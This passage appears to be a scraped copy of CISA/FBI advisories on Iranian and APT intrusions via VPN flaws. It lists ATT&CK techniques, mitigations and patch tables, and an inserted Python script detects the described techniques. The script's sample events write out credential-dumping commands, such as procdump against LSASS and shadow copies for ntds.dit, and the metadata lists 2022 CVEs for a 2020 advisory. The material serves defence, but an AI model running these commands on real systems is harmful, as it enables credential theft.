persistence.\n\n_Table 4: Persistence techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1053.003](<https://attack.mitre.org/techniques/T1053/003/>)\n\n| Scheduled Task/Job: Cron | The threat actor loaded a series of scripts to `cron` and ran them for various purposes (mainly to access NetScaler web forms). \n \n[T1053.005](<https://attack.mitre.org/techniques/T1053/005/>)\n\n| Scheduled Task/Job: Scheduled Task | The threat actor installed and used FRPC (`frpc.exe`) on both NetScaler and internal devices. The task was named `lpupdate` and the binary was named `svchost`, which was the reverse proxy. 
The threat actor executed this command daily. \n \n[T1505.003](<https://attack.mitre.org/techniques/T1505/003/>)\n\n| Server Software Component: Web Shell | The threat actor used several web shells on existing web servers. Both NetScaler and web servers called out for ChunkyTuna. \n \n[T1546.008](<https://attack.mitre.org/techniques/T1546/008/>)\n\n| Event Triggered Execution: Accessibility Features | The threat actor used sticky keys (`sethc.exe`) to launch `cmd.exe`. \n \n#### Privilege Escalation\n\nCISA observed no evidence of direct privilege escalation. The threat actor attained domain administrator credentials on the NetScaler device via exploit and continued to expand credential access on the network.\n\n#### Defense Evasion\n\nCISA observed the threat actor using the techniques identified in table 5 to evade detection.\n\n_Table 5: Defensive evasion techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1027.002](<https://attack.mitre.org/techniques/T1027/002/>)\n\n| Obfuscated Files or Information: Software Packing | The threat actor used base64 encoding for payloads on NetScaler during initial access, making the pre-compiled payloads harder to detect. \n \n[T1027.004](<https://attack.mitre.org/techniques/T1027/004/>)\n\n| Obfuscated Files or Information: Compile After Delivery | The threat actor used base64 encoding schemes on distributed (uncompiled) scripts and files to avoid detection. \n \n[T1036.004](<https://attack.mitre.org/techniques/T1036/004/>)\n\n| Masquerading: Masquerade Task or Service | The threat actor used FRPC (`frpc.exe`) daily as a reverse proxy, tunneling RDP over TLS. The FRPC (`frpc.exe`) task name was `lpupdate` and ran out of the Input Method Editor (IME) directory. In other events, the threat actor has been observed hiding activity via ngrok. 
\n \n[T1036.005](<https://attack.mitre.org/techniques/T1036/005/>)\n\n| Masquerading: Match Legitimate Name or Location | The FRPC (`frpc.exe`) binary name was `svchost`, and the configuration file was `dllhost.dll`, attempting to masquerade as a legitimate Dynamic Link Library. \n \n[T1070.004](<https://attack.mitre.org/techniques/T1070/004/>)\n\n| Indicator Removal on Host: File Deletion | To minimize their footprint, the threat actor ran `./httpd-nscache_clean` every 30 minutes, which cleaned up files on the NetScaler device. \n \n#### Credential Access\n\nCISA observed the threat actor using the techniques identified in table 6 to further their credential access.\n\n_Table 6: Credential access techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1003.001](<https://attack.mitre.org/techniques/T1003/001/>)\n\n| OS Credential Dumping: LSASS Memory | The threat actor used `procdump` to dump process memory from the Local Security Authority Subsystem Service (LSASS). \n \n[T1003.003](<https://attack.mitre.org/techniques/T1003/003/>)\n\n| OS Credential Dumping: Windows NT Directory Services (NTDS) | The threat actor used Volume Shadow Copy to access credential information from the NTDS file. \n \n[T1552.001](<https://attack.mitre.org/techniques/T1552/001/>)\n\n| Unsecured Credentials: Credentials in Files | The threat actor accessed files containing valid credentials. \n \n[T1555](<https://attack.mitre.org/techniques/T1555/>)\n\n| Credentials from Password Stores | The threat actor accessed a `KeePass` database multiple times and used `kee.ps1` PowerShell script. \n \n[T1558](<https://attack.mitre.org/techniques/T1558/>)\n\n| Steal or Forge Kerberos Tickets | The threat actor conducted a directory traversal attack by creating files and exfiltrating a Kerberos ticket on a NetScaler device. The threat actor was then able to gain access to a domain account. 
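The host behaviours in Tables 3 through 6 above (an FRPC binary named `svchost` run from the IME directory with a `dllhost.dll` configuration, a scheduled task named `lpupdate`, `sethc.exe` launching `cmd.exe`, `procdump` against LSASS, Volume Shadow Copy access to NTDS, and Base64-encoded scripts) map directly onto process-creation telemetry. The Python below is an added example written for this page, not code from CISA or the advisory: the event records are constructed to resemble Sysmon Event ID 1 fields, and the hostnames, file paths, the `whoami` payload and the rule thresholds are assumptions made for illustration.

```python
"""Process-creation triage for the host behaviours in Tables 3-6 of the advisory.
Added example for this page, not code from CISA. Event fields follow the shape of
Sysmon Event ID 1 (Image, CommandLine, ParentImage); all hosts, paths and the
Base64 payload below are constructed for illustration."""
import base64
import ntpath
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    host: str
    image: str         # full path of the new process
    cmdline: str       # its command line
    parent_image: str  # full path of the parent process

SYSTEM32 = r"c:\windows\system32"

def _name(path):
    return ntpath.basename(path).lower()

def decode_encoded_powershell(cmdline):
    """Plaintext of a PowerShell -EncodedCommand argument (Base64 over UTF-16LE), else None."""
    m = re.search(r"\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # not Base64, or not UTF-16 text
        return None

def rule_masquerade_system_binary(ev):
    """T1036.005: svchost.exe running from anywhere but System32 (FRPC ran as 'svchost' from IME)."""
    if _name(ev.image) == "svchost.exe" and ntpath.dirname(ev.image).lower() != SYSTEM32:
        return "svchost.exe outside System32: " + ev.image

def rule_sticky_keys_shell(ev):
    """T1546.008: a shell whose parent is the accessibility helper sethc.exe."""
    if _name(ev.parent_image) == "sethc.exe" and _name(ev.image) in ("cmd.exe", "powershell.exe"):
        return "shell spawned by sethc.exe"

def rule_lsass_dump(ev):
    """T1003.001: procdump pointed at LSASS (-ma requests a full memory dump)."""
    cl = ev.cmdline.lower()
    if "lsass" in cl and ("procdump" in _name(ev.image) or "-ma" in cl.split()):
        return "LSASS memory dump: " + ev.cmdline

def rule_shadow_copy_ntds(ev):
    """T1003.003: shadow copy creation or a direct reference to ntds.dit."""
    cl = ev.cmdline.lower()
    if re.search(r"vssadmin(\.exe)?\s+create\s+shadow", cl) or "ntds.dit" in cl:
        return "volume shadow copy / ntds.dit access"

def rule_scheduled_task_lpupdate(ev):
    """T1053.005: schtasks creating the task name observed in this campaign."""
    cl = ev.cmdline.lower()
    if _name(ev.image) == "schtasks.exe" and "/create" in cl and re.search(r'/tn\s+"?lpupdate\b', cl):
        return "scheduled task 'lpupdate' created"

def rule_encoded_powershell(ev):
    """T1027: PowerShell started with a Base64-encoded command; the decoded text is surfaced."""
    if _name(ev.image) in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_powershell(ev.cmdline)
        if decoded is not None:
            return "encoded PowerShell command decodes to: " + decoded

RULES = [rule_masquerade_system_binary, rule_sticky_keys_shell, rule_lsass_dump,
         rule_shadow_copy_ntds, rule_scheduled_task_lpupdate, rule_encoded_powershell]

def triage(events):
    """Run every rule over every event; one (host, rule name, reason) tuple per hit."""
    hits = []
    for ev in events:
        for rule in RULES:
            reason = rule(ev)
            if reason:
                hits.append((ev.host, rule.__name__, reason))
    return hits

# Constructed sample: six events mirroring the advisory's TTPs, then two benign ones.
SAMPLE_EVENTS = [
    ProcEvent("srv-file02", r"C:\Windows\IME\svchost.exe",
              r"C:\Windows\IME\svchost.exe -c dllhost.dll", r"C:\Windows\System32\svchost.exe"),
    ProcEvent("srv-file02", r"C:\Windows\System32\cmd.exe", "cmd.exe", r"C:\Windows\System32\sethc.exe"),
    ProcEvent("srv-dc01", r"C:\Tools\procdump64.exe",
              "procdump64.exe -accepteula -ma lsass.exe lsass.dmp", r"C:\Windows\System32\cmd.exe"),
    ProcEvent("srv-dc01", r"C:\Windows\System32\vssadmin.exe", "vssadmin.exe create shadow /for=C:",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent("srv-file02", r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /tn lpupdate /tr "C:\Windows\IME\svchost.exe -c dllhost.dll" /sc daily',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent("wks-0412", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -enc dwBoAG8AYQBtAGkA",  # constructed; decodes to "whoami"
              r"C:\Windows\explorer.exe"),
    ProcEvent("wks-0412", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs -p -s Schedule",
              r"C:\Windows\System32\services.exe"),
    ProcEvent("wks-0412", r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for host, rule, reason in triage(SAMPLE_EVENTS):
        print(f"{host:12} {rule:32} {reason}")
```

Run as a script it prints one line per hit for the sample; the two benign events (the real `svchost.exe` under System32 and a `cmd.exe /c dir` from Explorer) produce nothing. `decode_encoded_powershell` is kept separate because an encoded command line is the first thing an analyst has to read, and a decode failure (a non-UTF-16 payload or a truncated field) returns `None` instead of raising, so the remaining rules still run over that event.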
\n \n#### Discovery\n\nCISA observed the threat actor using the techniques identified in table 7 to learn more about the victim environments.\n\n_Table 7: Discovery techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1018](<https://attack.mitre.org/techniques/T1018/>)\n\n| Remote System Discovery | The threat actor used Angry IP Scanner to detect remote systems. \n \n[T1083](<https://attack.mitre.org/techniques/T1083/>)\n\n| File and Directory Discovery | The threat actor used WizTree to obtain network files and directory listings. \n \n[T1087](<https://attack.mitre.org/techniques/T1087/>)\n\n| Account Discovery | The threat actor accessed `ntuser.dat` and `UserClass.dat` and used Softerra LDAP Browser to browse documentation for service accounts. \n \n[T1217](<https://attack.mitre.org/techniques/T1217/>)\n\n| Browser Bookmark Discovery | The threat actor used Google Chrome bookmarks to find internal resources and assets. \n \n#### Lateral Movement\n\nCISA also observed the threat actor using open-source tools such as Plink and TightVNC for lateral movement. CISA observed the threat actor using the techniques identified in table 8 for lateral movement within the victim environment.\n\n_Table 8: Lateral movement techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1021](<https://attack.mitre.org/techniques/T1021/>)\n\n| Remote Services | The threat actor used RDP with valid account credentials for lateral movement in the environment. \n \n[T1021.001](<https://attack.mitre.org/techniques/T1021/001/>)\n\n| Remote Services: Remote Desktop Protocol | The threat actor used RDP to log in and then conduct lateral movement. \n \n[T1021.002](<https://attack.mitre.org/techniques/T1021/002/>)\n\n| Remote Services: SMB/Windows Admin Shares | The threat actor used PsExec and its PSEXESVC service pervasively on several hosts. The threat actor was also observed using a valid account to access SMB shares. 
\n[T1021.004](<https://attack.mitre.org/techniques/T1021/004/>) | Remote Services: SSH | The threat actor used Plink and PuTTY for lateral movement. Artifacts of Plink encrypted sessions were present in the system registry hive. \n[T1021.005](<https://attack.mitre.org/techniques/T1021/005/>) | Remote Services: Virtual Network Computing (VNC) | The threat actor installed TightVNC server and client pervasively on compromised servers and endpoints in the network environment as a lateral movement tool. \n[T1563.002](<https://attack.mitre.org/techniques/T1563/002/>) | Remote Service Session Hijacking: RDP Hijacking | The threat actor likely hijacked a legitimate RDP session to move laterally within the network environment. \n \n#### Collection\n\nCISA observed the threat actor using the techniques identified in table 9 for collection within the victim environment.\n\n_Table 9: Collection techniques_\n\nID | Technique/Sub-Technique | Context \n---|---|--- \n[T1005](<https://attack.mitre.org/techniques/T1005/>) | Data from Local System | The threat actor searched local system sources to access sensitive documents. \n[T1039](<https://attack.mitre.org/techniques/T1039/>) | Data from Network Shared Drive | The threat actor searched network shares to access sensitive documents. \n[T1213](<https://attack.mitre.org/techniques/T1213/>) | Data from Information Repositories | The threat actor accessed victim security/IT monitoring environments, Microsoft Teams, etc., to mine valuable information. \n[T1530](<https://attack.mitre.org/techniques/T1530/>) | Data from Cloud Storage Object | The threat actor obtained files from the victim cloud storage instances. \n[T1560.001](<https://attack.mitre.org/techniques/T1560/001/>) | Archive Collected Data: Archive via Utility | The threat actor used 7-Zip to archive data. 
\n \n#### Command and Control\n\nCISA observed the threat actor using the techniques identified in table 10 for command and control (C2).\n\n_Table 10: Command and control techniques_\n\nID | Technique/Sub-Technique | Context \n---|---|--- \n[T1071.001](<https://attack.mitre.org/techniques/T1071/001/>) | Application Layer Protocol: Web Protocols | The threat actor used various web mechanisms and protocols, including the web shells listed in table 1. \n[T1105](<https://attack.mitre.org/techniques/T1105/>) | Ingress Tool Transfer | The threat actor downloaded tools such as PsExec directly to endpoints and downloaded web shells and scripts to NetScaler in base64-encoded schemes. \n[T1572](<https://attack.mitre.org/techniques/T1572/>) | Protocol Tunneling | The threat actor used `FRPC.exe` to tunnel RDP over port 443. The threat actor has also been observed using ngrok for tunneling. \n \n#### Exfiltration\n\nCISA currently has no direct evidence of data exfiltration by this threat actor but assesses that exfiltration likely occurred, given the use of 7-Zip and the viewing of sensitive documents.\n\n### Mitigations\n\n#### Recommendations\n\nCISA and FBI recommend implementing the following recommendations.\n\n * If your organization has not patched for the Citrix CVE-2019-19781 vulnerability, and a compromise is suspected, follow the recommendations in CISA Alert [AA20-031A](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>).\n * This threat actor has been observed targeting other CVEs mentioned in this report; follow the recommendations in the CISA resources provided below.\n * If using Windows Active Directory and compromise is suspected, conduct remediation of the compromised Windows Active Directory forest. 
\n * If compromised, rebuild/reimage compromised NetScaler devices.\n * Routinely audit configuration and patch management programs.\n * Monitor network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., SSH, SMB, RDP).\n * Implement multi-factor authentication, especially for privileged accounts.\n * Use separate administrative accounts on separate administration workstations.\n * Implement the principle of least privilege on data access.\n * Secure RDP and other remote access solutions using multifactor authentication and \u201cjump boxes\u201d for access.\n * Deploy endpoint defense tools on all endpoints; ensure they work and are up to date.\n * Keep software up to date.\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:%20CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. 
To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto:%20Central@cisa.dhs.gov>).\n\n### Resources\n\n[CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>) \n[CISA Alert AA20-073A: Enterprise VPN Security](<https://us-cert.cisa.gov/ncas/alerts/aa20-073a>) \n[CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>) \n[CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>) \n[CISA Security Tip: Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>)\n\n### Revisions\n\nSeptember 15, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T12:00:00", "type": "ics", "title": "Iran-Based Threat Actor Exploits VPN Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-11539", "CVE-2019-19781", "CVE-2020-5902", "CVE-2022-42475", 
"CVE-2022-47966"], "modified": "2020-09-15T12:00:00", "id": "AA20-259A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-259a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-23T07:28:38", "description": "### Summary\n\n_This joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\n**Note:** the analysis in this joint cybersecurity advisory is ongoing, and the information provided should not be considered comprehensive. The Cybersecurity and Infrastructure Security Agency (CISA) will update this advisory as new information is available.\n\nThis joint cybersecurity advisory was written by CISA with contributions from the Federal Bureau of Investigation (FBI). \n\nCISA has recently observed advanced persistent threat (APT) actors exploiting multiple legacy vulnerabilities in combination with a newer privilege escalation vulnerability\u2014[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)\u2014in Windows Netlogon. The commonly used tactic, known as vulnerability chaining, exploits multiple vulnerabilities in the course of a single intrusion to compromise a network or application. \n\nThis recent malicious activity has often, but not exclusively, been directed at federal and state, local, tribal, and territorial (SLTT) government networks. Although it does not appear these targets are being selected because of their proximity to elections information, there may be some risk to elections information housed on government networks.\n\nCISA is aware of some instances where this activity resulted in unauthorized access to elections support systems; however, CISA has no evidence to date that integrity of elections data has been compromised. 
There are steps that election officials, their supporting SLTT IT staff, and vendors can take to help defend against this malicious cyber activity.\n\nSome common tactics, techniques, and procedures (TTPs) used by APT actors include leveraging legacy network access and virtual private network (VPN) vulnerabilities in association with the recent critical [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) Netlogon vulnerability. CISA is aware of multiple cases where the Fortinet FortiOS Secure Socket Layer (SSL) VPN vulnerability [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) has been exploited to gain access to networks. To a lesser extent, CISA has also observed threat actors exploiting the MobileIron vulnerability [CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>). While these exploits have been observed recently, this activity is ongoing and still unfolding.\n\nAfter gaining initial access, the actors exploit [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) to compromise all Active Directory (AD) identity services. Actors have then been observed using legitimate remote access tools, such as VPN and Remote Desktop Protocol (RDP), to access the environment with the compromised credentials. 
Observed activity targets multiple sectors and is not limited to SLTT entities.\n\nCISA recommends network staff and administrators review internet-facing infrastructure for these and similar vulnerabilities that have been or could be exploited to similar effect, including Juniper [CVE-2020-1631](<https://nvd.nist.gov/vuln/detail/CVE-2020-1631>), Pulse Secure [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), Citrix NetScaler [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), and Palo Alto Networks [CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>) (this list is not considered exhaustive).\n\n### Technical Details\n\n### Initial Access\n\nAPT threat actors are actively leveraging legacy vulnerabilities in internet-facing infrastructure (_Exploit Public-Facing Application_ [[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190/>)], _External Remote Services_ [[T1133](<https://attack.mitre.org/versions/v7/techniques/T1133/>)]) to gain initial access into systems. The APT actors appear to have predominantly gained initial access via the Fortinet FortiOS VPN vulnerability [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>).\n\nAlthough not observed in this campaign, other vulnerabilities, listed below, could be used to gain network access (as analysis is evolving, these listed vulnerabilities should not be considered comprehensive). 
As a best practice, it is critical to patch all known vulnerabilities within internet-facing infrastructure.\n\n * Citrix NetScaler [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n * MobileIron [CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>)\n * Pulse Secure [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n * Palo Alto Networks [CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>)\n * F5 BIG-IP [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)\n\n#### Fortinet FortiOS SSL VPN CVE-2018-13379\n\n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) is a path traversal vulnerability in the FortiOS SSL VPN web portal. An unauthenticated attacker could exploit this vulnerability to download FortiOS system files through specially crafted HTTP resource requests.[[1](<https://www.fortiguard.com/psirt/FG-IR-18-384>)]\n\n### MobileIron Core & Connector Vulnerability CVE-2020-15505\n\n[CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) is a remote code execution vulnerability in MobileIron Core & Connector versions 10.3 and earlier.[[2](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>)] This vulnerability allows an external attacker, with no privileges, to execute code of their choice on the vulnerable system. As mobile device management (MDM) systems are critical to configuration management for external devices, they are usually highly permissioned and make a valuable target for threat actors.\n\n### Privilege Escalation\n\nPost initial access, the APT actors use multiple techniques to expand access to the environment. The actors are leveraging [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) in Windows Netlogon to escalate privileges and obtain access to Windows AD servers. 
Actors are also leveraging open-source tools such as Mimikatz and CrackMapExec to obtain valid account credentials from AD servers (_Valid Accounts_ [[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078/>)]).\n\n#### Microsoft Netlogon Remote Protocol Vulnerability: CVE-2020-1472\n\n[CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) is a vulnerability in Microsoft Windows Netlogon Remote Protocol (MS-NRPC), a core authentication component of Active Directory.[[3](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)] This vulnerability could allow an unauthenticated attacker with network access to a domain controller to completely compromise all AD identity services (_Valid Accounts: Domain Accounts_ [[T1078.002](<https://attack.mitre.org/versions/v7/techniques/T1078/002/>)]). Malicious actors can leverage this vulnerability to compromise other devices on the network (_Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v7/tactics/TA0008/>)]).\n\n### Persistence\n\nOnce system access has been achieved, the APT actors abuse legitimate credentials (_Valid Accounts_ [[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078/>)]) to log in via VPN or remote access services (_External Remote Services_ [[T1133](<https://attack.mitre.org/versions/v7/techniques/T1133/>)]) to maintain persistence.\n\n### Mitigations\n\nOrganizations with externally facing infrastructure devices that have the vulnerabilities listed in this joint cybersecurity advisory, or other vulnerabilities, should move forward with an \u201cassume breach\u201d mentality. As initial exploitation and escalation may be the only observable exploitation activity, most mitigations will need to focus on more traditional network hygiene and user management activities.\n\n### Keep Systems Up to Date\n\nPatch systems and equipment promptly and diligently. 
Establishing and consistently maintaining a thorough patching cycle continues to be the best defense against adversary TTPs. See table 1 for patch information on CVEs mentioned in this report.\n\n_Table 1: Patch information for CVEs_\n\n**Vulnerability** | **Vulnerable Products** | **Patch Information** \n---|---|--- \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) | \n\n * FortiOS 6.0: 6.0.0 to 6.0.4\n * FortiOS 5.6: 5.6.3 to 5.6.7\n * FortiOS 5.4: 5.4.6 to 5.4.12\n| \n\n * [Fortinet Security Advisory: FG-IR-18-384](<https://www.fortiguard.com/psirt/FG-IR-18-384>) \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | \n\n * Citrix Application Delivery Controller\n * Citrix Gateway\n * Citrix SDWAN WANOP\n| \n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0 ](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n * [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) | \n\n * Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)\n| \n\n * [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) | \n\n * Pulse Connect 
Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15\n * Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15\n| \n\n * [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n[CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) | \n\n * MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0 \n * Sentry versions 9.7.2 and earlier, and 9.8.0; \n * Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier\n| \n\n * [MobileIron Blog: MobileIron Security Updates Available](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>) \n[CVE-2020-1631](<https://nvd.nist.gov/vuln/detail/CVE-2020-1631>) | \n\n * Junos OS 12.3, 12.3X48, 14.1X53, 15.1, 15.1X49, 15.1X53, 17.2, 17.3, 17.4, 18.1, 18.2, 18.3, 18.4, 19.1, 19.2, 19.3, 19.4, 20.1\n| \n\n * [Juniper Security Advisory JSA11021](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11021>) \n[CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>) | \n\n * PAN-OS 9.1 versions earlier than PAN-OS 9.1.3; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9; PAN-OS 8.1 versions earlier than PAN-OS 8.1.15, and all versions of PAN-OS 8.0 (EOL)\n| \n\n * [Palo Alto Networks Security Advisory for CVE-2020-2021](<https://security.paloaltonetworks.com/CVE-2020-2021>) \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | \n\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2016\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows 
Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n * Windows Server, version 2004 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) \n \n### Comprehensive Account Resets\n\nIf there is an observation of [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) Netlogon activity or other indications of valid credential abuse detected, it should be assumed the APT actors have compromised AD administrative accounts, the AD forest should not be fully trusted, and, therefore, a new forest should be deployed. Existing hosts from the old compromised forest cannot be migrated in without being rebuilt and rejoined to the new domain, but migration may be done through \u201ccreative destruction,\u201d wherein as endpoints in the legacy forest are decommissioned, new ones can be built in the new forest. This will need to be completed on on-premise as well as Azure-hosted AD instances.\n\nNote that fully resetting an AD forest is difficult and complex; it is best done with the assistance of personnel who have successfully completed the task previously.\n\nIt is critical to perform a full password reset on all user and computer accounts in the AD forest. Use the following steps as a guide.\n\n 1. Create a temporary administrator account, and use this account only for all administrative actions\n 2. Reset the Kerberos Ticket Granting Ticket (`krbtgt`) password [[4](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)]; this must be completed before any additional actions (a second reset will take place in step 5)\n 3. Wait for the krbtgt reset to propagate to all domain controllers (time may vary)\n 4. 
